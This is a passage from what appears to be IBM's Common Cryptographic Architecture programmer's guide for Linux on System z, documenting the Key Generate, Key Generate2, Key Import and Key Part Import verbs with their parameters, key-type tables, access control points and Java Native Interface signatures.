theAES master key. For DES, the +verb selectively returns one copy of the key or two, with each copy enciphered under a user-specified DES +key-encrypting key. +This verb returns the key to the application program that called it and the application program can then +use the CCAkey storage verbs to store the key in the key storage file. +Format +CSNBKGN( +return_code, +reason_code, +exit_data_length, +exit_data, +key_form, +key_length, +key_type_1, +key_type_2, +kek_key_identifier_1, +kek_key_identifier_2, +generated_key_identifier_1, +generated_key_identifier_2 ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_form +Direction: Input Type: String +A4-byte keyword that defines the type of key you want generated. This parameter also specifies if +each key should be returned for either operational, importable, or exportable use. The keyword must +be in a 4-byte field, left-justified, and padded with blanks. +The possible key forms are: +Operational (OP) +The key is used for cryptographic operations on the local system. Operational keys are protected +by master key variants and can be stored in the CCAkey storage file or held by applications in +internal key tokens. +Importable (IM) +The key is stored with a file or sent to another system. Importable keys are protected by importer +key-encrypting keys. +Exportable (EX) +The key is transported or exported to another system and imported there for use. Exportable keys +are protected by exporter key-encrypting keys and cannot be used by CCAverb. +120 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Generate (CSNBKGN) +Importable and exportable keys are contained in external key tokens. For more information on key +tokens, refer to “Key token” on page 21. +The first two characters refer to key_type_1. The next two characters refer to key_type_2. +The following keywords are allowed: OP, IM, EX, OPIM, OPEX, IMEX, EXEX, OPOP, and IMIM. See +Table23 for their meanings. +Table23.KeywordsfortheKeyGenerateverbkey_formparameter +Keyword Description +EX Onekeythatcanbesenttoanothersystem. +EXEX Akeypair;bothkeystobesentelsewhere,possiblyforexportingtotwodifferentsystems.Thekey +pairhasthesameclearvalue. +IM Onekeythatcanbelocallyimported.Thekeycanlaterbeimportedontothissystemtomakeit +operational. +IMEX Akeypairtobeimported;onekeytobeimportedlocallyandonekeytobesentelsewhere.Bothkeys +havethesameclearvalue. +IMIM Akeypairtobeimported;bothkeystobeimportedlocallyatalatertime. +OP Oneoperationalkey.Thekeyisreturnedtothecallerinthekeytokenformat. +OPEX Akeypair;onekeythatisoperationalandonekeytobesentfromthissystem.Bothkeyshavethe +sameclearvalue. +OPIM Akeypair;onekeythatisoperationalandonekeytobeimportedtothelocalsystem.Bothkeyshave +thesameclearvalue.Ontheothersystem,theexternalkeytokencanbeimportedtomakeit +operational. +OPOP Akeypair;normallywithdifferentcontrolvectorvalues. +The key forms are defined as follows: +Operational (OP) +The key value is enciphered under a master key. The result is placed into an internal key +token. The key is then operational at the local system. +Importable (IM) +The key value is enciphered under an importer key-encrypting key. The result is placed into an +external key token. +Exportable (EX) +The key value is enciphered under an exporter key-encrypting key. The result is placed into an +external key token. The key can then be transported or exported to another system and +imported there for use. This key form cannot be used by any CCAverb. +The keys are placed into tokens that the generated_key_identifier_1 and generated_key_identifier_2 +parameters identify. +Valid key type combinations depend on the key form. See Table27 for valid key combinations. +key_length +Direction: Input Type: String +| An 8-byte value that defines the length of the key as being 8, 16, 24 or 32 bytes. The keyword must +| be left-justified and padded on the right with blanks. You must supply one of the key length values in +| the key_length parameter. +| Table24 on page 122 lists the key lengths used for various key types. +Chapter5.ManagingAESandDEScryptographickeys 121 + +Key Generate (CSNBKGN) +|| Table24.KeylengthvaluesfortheKeyGenerateverb. KeylengthvaluesfortheKeyGenerateverb +||| Value Description Algorithm +||| SINGLE,SINGLE-RorKEYLN8 Singlelength(8-byteor64-bit)key DES +||| DOUBLEorKEYLN16 Doublelength(16-byteor128-bit)key AESorDES +||| KEYLN24 Triplelength(24-byteor192-bit)key AESorDES +||| KEYLN32 32-byte(256-bit)key AES +| +| AES keys allow only KEYLN16, KEYLN24, and KEYLN32. To generate a 128-bitAES key, specify +| key_length as KEYLN16. For 192-bitAES keys specify key_length as KENLN24.A256-bitAES key +| requires a key_length of KEYLN32.AllAES keys are DATAkeys. +Keys with a length of 32 bytes have four 8-byte key parts. This key length is valid only forAES keys. +To generate a 32-byteAES key with four different values to be the basis of each key part, specify +key_length as KEYLN32. +To generate a single-length key, specify key_length as SINGLE or KEYLN8. +| Double-length (16-byte) keys have an 8-byte left half and an 8-byte right half. Both halves can have +| identical clear values or not. If you want the same value to be used in both key halves (called +| replicated key values), specify a key_length of SINGLE, SINGLE-R or KEYLN8. If you want different +| values to be the basis of each key half, specify a key_length of DOUBLE or KEYLN16. +| Triple-length (24-byte) keys have three 8-byte key parts. This key length is valid for DATAkeys only. To +| generate a triple-length DATAkey with three different values to be the basis of each key part, specify a +| key_length of KEYLN24. +| Use SINGLE/SINGLE-R if you want to create a DES transport key that you would use to exchange +| DATAkeys with a PCF system. Because PCF does not use double-length transport keys, specify +| SINGLE so that the effects of multiple encipherment are nullified. +| When generating anAKEK, the key_length parameter is ignored. TheAKEK key length (8-byte or +| 16-byte) is determined by the skeleton token created by the Key Token Build verb and provided in the +| generated_key_identifier_1 parameter. +The key length specified must be consistent with the key length indicated by the token you supply. For +DES keys, this length is a field in the control vector. ForAES keys, the length is an explicit field in the +token. Table25shows the valid key lengths for each key type.An X indicates that a key length is +permitted for a key type.AY indicates that the key generated will be a double-length key with +replicated key values. It is preferred that SINGLE-R be used for this result. +Table25.KeyGenerate-keylengthsforeachkeytype +Single Double Triple +KeyType (KEYLN8) Single-R (KEYLN16) (KEYLN24) (KEYLN32) +X X X +AES X X X +AESTOKEN +MAC X X +MACVER X X +DATA X X X +122 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Generate (CSNBKGN) +Table25.KeyGenerate-keylengthsforeachkeytype (continued) +Single Double Triple +KeyType (KEYLN8) Single-R (KEYLN16) (KEYLN24) (KEYLN32) +DATAM X +DATAMV X +X +EXPORTER Y X X +IMPORTER Y X X +IKEYXLAT Y X X +OKEYXLAT Y X X +CIPHER X X +DECIPHER X X +ENCIPHER X X +IPINENC Y X X +OPINENC Y X X +PINGEN Y X X +PINVER Y X X +CVARDEC* X X +CVARENC* X X +CVARPINE* X X +CVARXCVL* X X +CVARXCVR* X X +DKYGENKY* X X X +KEYGENKY* X X +Note: Key types marked with an asterisk (*) are requested through the use of the TOKEN keyword +and specifying a proper control vector in a key token. +key_type_1 +Direction: Input Type: String +An 8-byte keyword from the following group: +| v AESDATA,AESTOKEN, CIPHER, DATA, DATAM, DATAMV, DATAXLAT, DECIPHER, ENCIPHER, +| EXPORTER, IKEYXLAT, IMPORTER, IPINENC, MAC, MACVER, OKEYXLAT, OPINENC, PINGEN, +| and PINVER +v or the keyword TOKEN +For information on the meaning of the key types, see Table1 on page 27. +Use the key_type_1 parameter for the first, or only key, that you want generated. The keyword must +be left-justified and padded with blanks. Valid type combinations depend on the key form. +Chapter5.ManagingAESandDEScryptographickeys 123 + +Key Generate (CSNBKGN) +If key_type_1 is TOKEN, CCAexamines the control vector (CV) field in the generated_key_identifier_1 +parameter to derive the key type. When key_type_1 is TOKEN, CCAdoes not check for the length of +the key for DATAkeys. Instead, it uses the key_length parameter to determine the length of the key. +Use theAESTOKEN keyword forAES keys, or the TOKEN keyword for DES keys to indicate that the +verb should determine the key type from the key token that you supply. ForAES, all keys are type +AESDATA. For DES, the key type is determined from the control vector in the key tokens.Alternatively, +you can specify the key type using keywords shown in Table26 on page 126 and Table27. +Key types can have mandatory key forms. For example, CVARENC keys must be generated in +pairs with CVARDEC keys. The reason is that a CVARENC key can only be used for encryption, and +without a CVARDEC key you cannot decrypt the data. See Table26 and Table27 for valid key type +and key form combinations. +key_type_2 +Direction: Input Type: String +An 8-byte keyword from the following group: +| v AESDATA,AESTOKEN, CIPHER, DATA, DATAM, DATAMV, DATAXLAT, DECIPHER, ENCIPHER, +| EXPORTER, IKEYXLAT, IMPORTER, IPINENC, MAC, MACVER, OKEYXLAT, OPINENC, PINGEN, +| and PINVER +v or the keyword TOKEN +For information on the meaning of the key types, see Table1 on page 27. +Use the key_type_2 parameter for a key pair, which is shown in Table27 on page 126. The keyword +must be left-justified and padded with blanks. Valid type combinations depend on the key form. +If key_type_2 is TOKEN, CCAexamines the control vector (CV) field in the generated_key_identifier_2 +parameter to derive the key type. When key_type_2 is TOKEN, CCAdoes not check for the length of +the key for DATAkeys. Instead, it uses the key_length parameter to determine the length of the key. +If you want only one key to be generated, specify the key_type_2 and KEK_key_identifier_2 as binary +zeros. +See Table26 on page 126 and Table27 on page 126 for valid key type and key form combinations. +KEK_key_identifier_1 +Direction: Input/Output Type: String +A64-byte string of an internal key token containing the importer or exporter key-encrypting key, or a +key label. If you supply a key label that is less than 64-bytes, it must be left-justified and padded with +blanks. KEK_key_identifier_1 is required for a key_form of IM, EX, IMEX, EXEX, or IMIM. +If the key_form is OP, OPEX, OPIM, or OPOP, the KEK_key_identifier_1 is null. +If the NOCV bit is on in the internal key token containing the key-encrypting key, the key-encrypting +key itself (not the key-encrypting key variant) is used to encipher the generated key. +Control vectors are explained in “Control vector” on page 25 and the NOCV bit is shown in Table121 +on page 423. +This parameter is not used when generatingAES keys, and should point to null key-tokens. +KEK_key_identifier_2 +Direction: Input/Output Type: String +A64-byte string of an internal key token containing the importer or exporter key-encrypting key, or a +key label of an internal token. If you supply a key label that is less than 64-bytes, it must be +left-justified and padded with blanks. KEK_key_identifier_2 is required for a key_form of OPIM, OPEX, +IMEX, IMIM, or EXEX. This field is ignored for key_form keywords OP, IM and EX. +124 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Generate (CSNBKGN) +If the NOCV bit is on in the internal key token containing the key-encrypting key, the key-encrypting +key itself (not the key-encrypting key variant) is used to encipher the generated key. +Control vectors are explained in “Control vector” on page 25 and the NOCV bit is shown in Table121 +on page 423. +This parameter is not used when generatingAES keys, and should point to null key-tokens. +generated_key_identifier_1 +Direction: Input/Output Type: String +This parameter specifies either a generated: +v Internal key token for an operational key form, or +v External key token containing a key enciphered under the kek_key_identifier_1 parameter. +If you specify a key_type_1 of TOKEN, then this field contains a valid token of the key type you want +to generate. Otherwise, on input, this parameter must be binary zeros. See key_type_1 for a list of +valid key types. +If you specify a key_type_1 of IMPORTER or EXPORTER and a key_form of OPEX, and if the +generated_key_identifier_1 parameter contains a valid internal token of the SAME type, the NOCV bit, +if on, is propagated to the generated key token. +Using theAESTOKEN or TOKEN keyword in the key type parameters requires that the key tokens +already exist when the verb is called, so the information in those tokens can be used to determine the +key type. In general, unless you are using theAESTOKEN or TOKEN keyword, you must identify a +null key token in the generated key identifier parameters on input. +generated_key_identifier_2 +Direction: Input/Output Type: String +This parameter specifies a generated external key token containing a key enciphered under the +kek_key_identifier_2 parameter. +If you specify a key_type_2 of TOKEN, then this field contains a valid token of the key type you want +to generate. Otherwise, on input, this parameter must be binary zeros. See key_type_1 for a list of +valid key types. +The token can be an internal or external token. +Using theAESTOKEN or TOKEN keyword in the key type parameters requires that the key tokens +already exist when the verb is called, so the information in those tokens can be used to determine the +key type. In general, unless you are using theAESTOKEN or TOKEN keyword, you must identify a +null key token in the generated key identifier parameters on input. +Restrictions +None +Required commands +Depending on the key_type and key_form parameters selected, the verb could require one or more of +these commands to be enabled in the active role: +||| +Offset Command +|| X'008C' KeyGenerate-OPIM_OPEX_IMEX_etc. +|| X'008E' KeyGenerate-OP_IM_EX +|| X'00D7' KeyGenerate-OPIM_OPEX_IMEX_etc.extended +|| X'00DB' KeyGenerate-SINGLE-R +| +Chapter5.ManagingAESandDEScryptographickeys 125 + +Key Generate (CSNBKGN) +Note: Arole with offset X'00DB' enabled can also use the Remote Key Export verb. +Usage notes +| Table26 shows the valid key type and key form combinations for a single key. Key types marked with an +| '*' must be requested through the specification of a proper control vector in a key token and through the +| use of the TOKEN keyword. See alsoAppendixC, “Key forms and types used in the Key Generate verb,” +| on page 459. +| Note: Not all key types are valid on all hardware. See Table1 on page 27. +For key typeAES, only key form OP is supported.AES keys cannot be generated in pairs. +Table26.KeywordsforKeyGenerate,validkeytypesandkeyformsforasinglekey +KeyType1 KeyType2 OP IM EX +||||| AESDATA Notapplicable X X X +DATA Notapplicable X X X +DATAC* Notapplicable X X X +DATAM Notapplicable X X X +DKYGENKY* Notapplicable X X X +KEYGENKY* Notapplicable X X X +MAC Notapplicable X X X +PINGEN Notapplicable X X X +Table27 shows the valid key type and key form combinations for a key pair. Key types marked with an "*" +must be requested through the specification of a proper control vector in a key token and through the use +of the TOKEN keyword. +Table27.KeywordsforKeyGenerate,validkeytypesandkeyformsforakeypair +KeyType1 KeyType2 OPEX EXEX OPIM,OPOP, IMEX +IMIM +CIPHER CIPHER X X X X +CIPHER DECIPHER X X X X +CIPHER ENCIPHER X X X X +CVARDEC* CVARENC* X X +CVARDEC* CVARPINE* X X +CVARENC* CVARDEC* X X +CVARENC* CVARXCVL* X X +CVARENC* CVARXCVR* X X +CVARXCVL* CVARENC* X X +CVARXCVR* CVARENC* X X +CVARPINE* CVARDEC* X X +DATA DATA X X X X +DATA DATAXLAT X X X +DATAC* DATAC* X X X X +DATAM DATAM X X X X +DATAM DATAMV X X X X +126 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Generate (CSNBKGN) +Table27.KeywordsforKeyGenerate,validkeytypesandkeyformsforakeypair (continued) +KeyType1 KeyType2 OPEX EXEX OPIM,OPOP, IMEX +IMIM +DATAXLAT DATAXLAT X X X +DECIPHER CIPHER X X X X +DECIPHER ENCIPHER X X X X +DKYGENKY* DKYGENKY* X X X X +ENCIPHER CIPHER X X X X +ENCIPHER DECIPHER X X X X +EXPORTER IKEYXLAT X X X +EXPORTER IMPORTER X X X +IKEYXLAT EXPORTER X X X +IKEYXLAT OKEYXLAT X X X +IMPORTER EXPORTER X X X +IMPORTER OKEYXLAT X X X +IPINENC OPINENC X X X X +KEYGENKY* KEYGENKY* X X X X +MAC MAC X X X X +MAC MACVER X X X X +OKEYXLAT IKEYXLAT X X X +OKEYXLAT IMPORTER X X X +OPINENC IPINENC X X X X +OPINENC OPINENC X +PINVER PINGEN X X X +PINGEN PINVER X X X +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKGNJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKGNJ are shown here. +Format +public native void CSNBKGNJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_form, +byte[] key_length, +byte[] key_type_1, +byte[] key_type_2, +byte[] KEK_key_identifier_1, +byte[] KEK_key_identifier_2, +byte[] generated_key_identifier_1, +byte[] generated_key_identifier_2 +); +Chapter5.ManagingAESandDEScryptographickeys 127 + +Key Generate2 (CSNBKGN2) +Key Generate2 (CSNBKGN2) +| +| Use the Key Generate2 verb to generate either one or two keys of any type. This verb does not produce +| keys in clear form and all keys are returned in encrypted form. When two keys are generated, each key +| has the same clear value, although this clear value is not exposed outside the secure cryptographic +| feature. +| This verb returns variable-length CCAkey tokens and uses theAESKW wrapping method. +| This verb supports HMAC keys. Operational keys will be encrypted under theAES master key. +Format +| +|| +CSNBKGN2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| clear_key_bit_length, +| key_type_1, +| key_type_2, +| key_name_1_length, +| key_name_1, +| key_name_2_length, +| key_name_2, +| user_associated_data_1_length, +| user_associated_data_1, +| user_associated_data_2_length, +| user_associated_data_2, +| key_encrypting_key_identifier_1_length, +| key_encrypting_key_identifier_1, +| key_encrypting_key_identifier_2_length, +| key_encrypting_key_identifier_2, +| generated_key_identifier_1_length, +| generated_key_identifier_1, +| generated_key_identifier_2_length, +| generated_key_identifier_2 ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 2. +| rule_array +|| Direction: Input Type: String +| The rule_array contains keywords that provide control information to the verb. The keywords must be +| in contiguous storage with each of the keywords left-justified in its own 8-byte location and padded on +| the right with blanks. The rule_array keywords are described in Table28. +|| Table28.KeywordsforKeyGenerate2controlinformation +|| Keyword Description +| Tokenalgorithm(Required) +128 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Generate2 (CSNBKGN2) +| Table28.KeywordsforKeyGenerate2controlinformation (continued) +|| Keyword Description +|| HMAC SpecifiestoimportanHMACkeytoken. +| Keyform(One,required) +|| OP Specifiesthatonecopyofthekeyisgenerated.Thekeywillbeanoperationalkeyofthekeytype +| specifiedbythekey_type_1parameterandisreturnedinthegenerated_key_identifier_1parameter. +|| OPOP Specifiesthattwocopiesofthekeyaregenerated.Thefirstkeywillbeanoperationalkeyofthekey +| typespecifiedbythekey_type_1parameterandisreturnedinthegenerated_key_identifier_1 +| parameter.Thesecondkeywillbeanoperationalkeyofthekeytypespecifiedbythekey_type_2 +| parameterandisreturnedinthegenerated_key_identifier_2parameter. +| +| clear_key_bit_length +|| Direction: Input Type: Integer +| Apointer to an integer variable containing the number of clear-key bits to randomly generate and +| return encrypted in the generated key or keys. The value can be 80 - 2048. +| key_type_1 +|| Direction: Input Type: String +| Use the key_type_1 parameter for the first, or only key, that you want generated. The keyword must +| be left-justified and padded with blanks. Valid type combinations depend on the key form. +| The 8-byte keyword for the key_type_1 parameter can be one of the following: +| v MAC +| v MACVER +| v TOKEN +| If key_type_1 is TOKEN, the associated data in the generated_key_identifier_1 parameter is used to +| derive the key type. +| key_type_2 +|| Direction: Input Type: String +| Use the key_type_2 parameter for a key pair, which is shown in Table29 on page 132. The keyword +| must be left-justified and padded with blanks. Valid type combinations depend on the key form. +| The 8-byte keyword for the key_type_2 parameter can be one of the following: +| v MAC +| v MACVER +| v TOKEN +| If key_type_2 is TOKEN, the associated data in the generated_key_identifier_2 parameter is used to +| derive the key type. +| When only one key is being generated, this parameter is ignored. +| key_name_1_length +|| Direction: Input Type: Integer +| The length of the key_name parameter for generated_key_identifier_1. Valid values are 0 and 64. +| key_name_1 +|| Direction: Input Type: String +| A64-byte key store label to be stored in the associated data structure of generated_key_identifier_1. +| key_name_2_length +| +Chapter5.ManagingAESandDEScryptographickeys 129 + +Key Generate2 (CSNBKGN2) +|| Direction: Input Type: Integer +| The length of the key_name parameter for generated_key_identifier_2. Valid values are 0 and 64. +| key_name_2 +|| Direction: Input Type: String +| A64-byte key store label to be stored in the associated data structure of generated_key_identifier_2. +| When only one key is being generated, this parameter is ignored. +| user_associated_data_1_length +|| Direction: Input Type: Integer +| The length of the user-associated data parameter for generated_key_identifier_1. The valid values are +| 0 - 255 bytes. +| user_associated_data_1 +|| Direction: Input Type: String +| User-associated data to be stored in the associated data structure for generated_key_identifier_1. +| user_associated_data_2_length +|| Direction: Input Type: Integer +| The length of the user-associated data parameter for generated_key_identifier_2. The valid values are +| 0 - 255 bytes. +| user_associated_data_2 +|| Direction: Input Type: String +| User associated data to be stored in the associated data structure for generated_key_identifier_2. +| When only one key is being generated, this parameter is ignored. +| key_encrypting_key_identifier_1_length +|| Direction: Input Type: Integer +| The byte length of the key_encrypting_key_identifier_1 parameter. This value must be 0. +| key_encrypting_key_identifier_1 +|| Direction: Input Type: String +| This parameter is ignored. +| key_encrypting_key_identifier_2_length +|| Direction: Input Type: Integer +| The byte length of the key_encrypting_key_identifier_2 parameter. This value must be 0. +| key_encrypting_key_identifier_2 +|| Direction: Input/Output Type: String +| This parameter is ignored. +| generated_key_identifier_1_length +|| Direction: Input/Output Type: Integer +| On input, the length of the buffer for the generated_key_identifier_1 parameter in bytes. The minimum +| value is 120 bytes and the maximum value is 725 bytes. +| On output, the parameter will hold the actual length of the generated_key_identifier_1. +130 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Generate2 (CSNBKGN2) +| generated_key_identifier_1 +|| Direction: Input/Output Type: String +| The buffer for the first generated key token. +| On input, if you specify a key_type_1 of TOKEN, then the buffer contains a valid key token of the key +| type you want to generate. The key token must be left justified in the buffer. Otherwise, this parameter +| must be binary zeros. See key_type_1 for a list of valid key types. +| On output, the buffer contains the generated key token. +| generated_key_identifier_2_length +|| Direction: Input/Output Type: Integer +| On input, the length of the buffer for the generated_key_identifier_2 in bytes. The minimum value is +| 120 bytes and the maximum value is 725 bytes. +| generated_key_identifier_2 +|| Direction: Input/Output Type: String +| The buffer for the second generated key token. +| On input, if you specify a key_type_2 of TOKEN, then the buffer contains a valid key token of the key +| type you want to generate. The key token must be left justified in the buffer. Otherwise, this parameter +| must be binary zeros. See key_type_2 for a list of valid key types. +| On output, the buffer contains the generated key token. +| When only one key is being generated, this parameter is ignored +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| Depending on the key_type and key_form parameters selected, the verb could require one or more of +| these commands to be enabled in the active role: +||| +Offset Command +|| X'00EA' KeyGenerate2-OP_EX_IM +|| X'00EB' KeyGenerate2-OPOP_OPIM_OPEX_etc. +| +Usage notes +| +| The key forms are defined as follows: +| Operational (OP) +| Specifies that one copy of the key is generated. The key will be an operational key of the key type +| specified by the key_type_1 parameter and is returned in the generated_key_identifier_1 +| parameter. +|| OPOP Two copies of the key are generated. The first key will be an operational key of the key type +| specified by the key_type_1 parameter and is returned in the generated_key_identifier_1 +| parameter. The second key will be an operational key of the key type specified by the key_type_2 +| parameter and is returned in the generated_key_identifier_2 parameter. +| This table lists the valid key type and key forms for HMAC keys +Chapter5.ManagingAESandDEScryptographickeys 131 + +Key Generate2 (CSNBKGN2) +|| Table29.KeyGenerate2validkeytypeandkeyformsforHMACkeys +|||| KeyType1 KeyType2 OP OPOP +|||| MAC Notapplicable X +|||| MAC MAC X +|||| MAC MACVER X +|||| MACVER MAC X +| +| The following table shows the access control points that control the function of this verb. +|| Table30.RequiredaccesscontrolpointsforKeyGenerate2 +||| KeyForm KeyType Accesscontrolpoint +||| OP MAC,MACVER KeyGenerate2–OP,EX,IM +||| OPOP MAC,MACVER KeyGenerate2–OPOP,OPIM,OPEX,etc. +| +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBKGN2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBKGN2J are shown here. +| +| Format +| public native void CSNBKGN2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| byte[] clear_key_bit_length, +| byte[] key_type_1, +| byte[] key_type_2, +| byte[] key_name_1_length, +| byte[] key_name_1, +| byte[] key_name_2_length, +| byte[] key_name_2, +| byte[] user_associated_data_1_length, +| byte[] user_associated_data_1, +| byte[] user_associated_data_2_length, +| byte[] user_associated_data_2, +| byte[] key_encrypting_key_identifier_1_length, +| byte[] key_encrypting_key_identifier_1, +| byte[] key_encrypting_key_identifier_2_length, +| byte[] key_encrypting_key_identifier_2, +| byte[] generated_key_identifier_1_length, +| byte[] generated_key_identifier_1, +| byte[] generated_key_identifier_2_length, +|| byte[] generated_key_identifier_2); +| +| +| +132 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Import (CSNBKIM) +Key Import (CSNBKIM) +Use the Key Import verb to re-encipher a key from encryption under an importer key-encrypting key to +encryption under the master key. The re-enciphered key is in operational form. +Choose one of the following options: +v Specify the key_type parameter as TOKEN and specify the external key token in the +source_key_identifier parameter. The key type information is determined from the control vector in the +external key token. +v Specify a key type in the key_type parameter and specify an external key token in the +source_key_identifier parameter. The specified key type must be compatible with the control vector in +the external key token. +v Specify a valid key type in the key_type parameter and a null key token in the source_key_identifier +parameter. The default control vector for the key_type specified will be used to process the key. +For DATAkeys, this verb generates a key of the same length as that contained in the input token. +Format +CSNBKIM( +return_code, +reason_code, +exit_data_length, +exit_data, +key_type, +source_key_identifier, +importer_key_identifier, +target_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_type +Direction: Input Type: String +The type of key you want to re-encipher under the master key. Specify an 8-byte keyword or the +keyword TOKEN. The keyword must be left-justified and padded on the right with blanks. +If the key type is TOKEN, CCAdetermines the key type from the control vector (CV) field in the +external key token provided in the source_key_identifier parameter. +TOKEN is never allowed when the importer_key_identifier parameter is NOCV. +Key type values for the Key Import verb are: +CIPHER EXPORTER OKEYXLAT +DATA IMPORTER OPINENC +DATAC IKEYXLAT PINGEN +DATAM IPINENC PINVER +DATAMV MAC TOKEN +DECIPHER MACVER +ENCIPHER MACD +For information on the meaning of the key types, see Table1 on page 27. +We recommend using key type of TOKEN when importing double-length MAC and MACVER keys. +source_key_identifier +Chapter5.ManagingAESandDEScryptographickeys 133 + +Key Import (CSNBKIM) +Direction: Input Type: String +The key you want to re-encipher under the master key. The parameter is a 64-byte field for the +enciphered key to be imported containing either an external key token or a null key token. If you +specify a null token, the token is all binary zeros, except for a key in bytes 16-23 or 16-31, or in bytes +16-31 and 48-55 for triple-length DATAkeys. Refer to Table123 on page 425. +If key type is TOKEN, this field might not specify a null token. +This verb supports the no-export function in the CV. +importer_key_identifier +Direction: Input/Output Type: String +The importer key-encrypting key that the key is currently encrypted under. The parameter is a 64-byte +area containing either the key label of the key in the cryptographic key data set or the internal key +token for the key. If you supply a key label that is less than 64-bytes, it must be left-justified and +padded with blanks. +Note: If you specify a NOCV importer in the importer_key_identifier parameter, the key to be imported +must be enciphered under the importer key itself. +target_key_identifier +Direction: Input/Output Type: String +This parameter is the generated re-enciphered key. The parameter is a 64-byte area that receives the +internal key token for the imported key. +If the imported key TYPE is IMPORTER or EXPORTER and the token key TYPE is the same, the +target_key_identifier parameter changes direction to both input and output. If the application passes a +valid internal key token for an IMPORTER or EXPORTER key in this parameter, the NOCV bit is +propagated to the imported key token. +Restrictions +For security reasons, requests will fail by default if they use an equal key halves importer to import a key +with unequal key halves. You must have access control point 'Key Import - Unrestricted' explicitly enabled +if you want to import keys in this manner. +Required commands +| This verb requires the Key Import command (offset X'0012') to be enabled in the active role. +| By also enabling the Key Import - Unrestricted command (offset X'027B'), you can permit a less secure +| mode of operation that enables an equal key-halves IMPORTER key-encrypting key to import a key having +| unequal key-halves (key parity bits are ignored). +Usage notes +Use of NOCV keys are controlled by an access control point in the CEX3C. Creation of NOCV +key-encrypting keys is available only for standard IMPORTERs and EXPORTERs. +This verb will mark an imported KEK as a NOCV-KEK KEK: +v If a token is supplied in the target token field, it must be a valid importer or exporter token. If the token +fails token validation, processing continues, but the NOCV flag will not be copied +v The source token (key to be imported) must be a importer or exporter with the default control vector. +v If the target token is valid and the NOCV flag is on and the source token is valid and the control vector +of the target token is exactly the same as the source token, the imported token will have the NOCV flag +set on. +134 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Import (CSNBKIM) +v If the target token is valid and the NOCV flag is on and the source token is valid and the control vector +of the target token is NOT exactly the same as the source token, a return code will be given. +v All other scenarios will complete successfully, but the NOCV flag will not be copied +The software bit used to mark the imported token with export prohibited is not supported on a CEX3C. The +internal token for an export prohibited key will have the appropriate control vector that prohibits export. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKIMJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKIMJ are shown here. +Format +public native void CSNBKIMJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_type, +byte[] source_key_token, +byte[] importer_key_identifier, +byte[] target_key_identifier +); +Chapter5.ManagingAESandDEScryptographickeys 135 + +Key Part Import (CSNBKPI) +Key Part Import (CSNBKPI) +Use the Key Part Import verb to combine, by XORing, the clear key parts of any key type and return the +combined key value either in an internal token or as an update to the key storage file. +| Before you use the Key Part Import verb for the first key part, you must use the Key Token Build or Key +| Token Build2 verb to create the internal key token into which the key will be imported. Subsequent key +| parts are combined with the first part in internal token form or as a label from the key storage file. +| The preferred way to specify key parts is FIRST,ADD-PART, and COMPLETE in the rule_array. Only +| when the combined key parts have been marked as COMPLETE can the key token be used in any +| cryptographic operation. The partial key can be passed to the Key Token Change or Key Token Change2 +| verb for re-encipherment, in case building the key was started during a master key change operation. The +| partial key can be passed to the Key Token Parse verb, in order to discover how the key token was +| originally specified, if researching an old partial key. Partial keys can also be passed to the Key Test, Key +| Test2, and Key Test Extended verbs. +Key parts can also be specified as FIRST, MIDDLE, or LAST in the rule_array.ADD-PART or MIDDLE can +be executed multiple times for as many key parts as necessary. Only when the LAST part has been +combined can the key token be used in any other service. +New applications should employ theADD-PART and COMPLETE keywords in lieu of the MIDDLE and +LAST keywords in order to ensure a separation of responsibilities between someone who can add key-part +information and someone who can declare that appropriate information has been accumulated in a key. +The Key Part Import verb can also be used to import a key without using key parts. Call the Key Part +Import verb FIRST with key part value X'0000...' then call the Key Part Import verb LAST with the +complete value. +Keys created using this service have odd parity. The FIRST key part is adjusted to odd parity.All +subsequent key parts are adjusted to even parity before being combined. +Format +CSNBKPI( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_part, +key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1 or 2. +rule_array +Direction: Input Type: String +136 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Part Import (CSNBKPI) +The keyword that provides control information to the verb. The keywords must be eight bytes of +contiguous storage with the keyword left-justified in its 8-byte location and padded on the right with +blanks. The rule_array keywords are described in Table31. 